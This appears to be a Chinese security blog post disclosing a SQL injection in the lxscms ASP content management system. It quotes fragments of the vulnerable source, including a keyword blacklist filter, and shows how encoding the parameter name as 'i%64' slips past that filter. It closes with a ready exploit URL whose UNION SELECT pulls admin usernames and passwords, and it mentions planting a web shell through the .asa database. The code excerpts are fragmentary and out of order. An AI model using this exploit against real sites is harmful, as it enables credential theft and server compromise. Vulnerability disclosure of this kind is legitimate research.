作者:Samy 出处:http://hi.baidu.com/0x7362/blog
dim idd
if idd="" then
call errbox("无效的参数传递","","","","")
end if
rs.open "select * from lxscms_i where shenhe=1 and id="&idd,conn,1,3
if rs.eof and rs.bof then
call errbox("您所查找的信息不存在","","","","")
if rs("hits")=0 or rs("hits")="" then
rs("hits")=1
else
end if
if rs("uurl") <> "" then
response.Redirect ""& rs("uurl") &""
end if
sub errbox(boxvalue,boxurl,box1,box2,box3)
if boxvalue = "" then
boxvalues = ""
else
boxvalues = boxvalue
if box1 = "1" then
else
boxurls = "history.go(-1);"
else
boxurls = "window.location.href = '"& boxurl &"';"
end if
if box1 = "1" then
response.write "<style>body {background:#fff;margin:auto;text-align:center;}.box1 {line-height:32px;font-size:14px;margin:60px;clear:both;}</style><div class='box1'>"& boxvalues &"<br /><a href='javascript:history.go(-1);'>后退至上一页</a> <a href='"& boxurls &"'>继续操作下一步</a></div>"
else
response.end
end if
end sub
Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Z'
Fy_Url=LCase(Request.ServerVariables("QUERY_STRING"))
redim Fy_Cs(ubound(Fy_a))
On Error Resume Next
Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)
Next
For Fy_x=0 to ubound(Fy_Cs) Fy_cs(0) =id
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
Case "1"
call errbox("因为你的某些非法操作,系统已经锁定了你的IP","","","")
Case "2"
Case "3"
call errbox("因为你的某些非法操作,系统已经锁定了你的IP","","","")
Response.End
程序根据name来判断 value If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0
如果我们对 value编码 最后会被解码 程序仍然可以检测到
绕过方法:
到这里i%64会被解码成id
可我们只对i%64赋值 这时id的值就为空了
Exp:
http://siteweb/infor.asp?i%64=-1 union select 1,qwbmuname,qwbmupwds,4,5,6+from+lxscms_u
另外数据库asa格式 。可插马